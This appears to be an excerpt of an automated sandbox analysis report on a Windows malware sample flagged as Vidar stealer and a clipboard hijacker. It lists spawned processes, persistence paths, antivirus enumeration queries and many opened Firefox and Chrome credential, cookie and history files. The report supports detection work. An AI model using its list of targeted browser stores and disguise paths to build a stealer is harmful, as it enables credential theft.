Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_05DE80F6 cpuid

0_2_05DE80F6

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_05DF3F87
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_05DF49EA
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	0_2_05DF394D
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_05DEC8B7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_05E00AB6
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	1_2_0043404A
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	1_2_00432B6D
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	1_2_00432FAD
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	1_2_004335E7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	1_2_0042BF17
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_05DB3F87
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	4_2_05DB49EA
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	4_2_05DB394D
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	4_2_05DAC8B7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_05DC0AB6
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	5_2_0043404A
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	5_2_00438178
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_00440116
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_004382A2
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	5_2_0043834F
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	5_2_00438423
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_004335E7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: EnumSystemLocalesW,	5_2_004387C8
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: GetLocaleInfoW,	5_2_0043884E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	5_2_00432B6D
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	5_2_00437BB3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: EnumSystemLocalesW,	5_2_00437E27
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	5_2_00437E83
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	5_2_00437F00
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	5_2_0042BF17
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	5_2_00437F83
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	5_2_00432FAD

Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_00408AE4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00408AE4

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

1_2_00419F90

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0042FE47

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

1_2_00419F90

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: der\MsMpeng.exe

Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.mstsca.exe.8f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.build2.exe.35815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5748, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\search.json.mozlz4	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pb	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\AlternateServices.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extension-preferences.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\times.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\xulstore.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
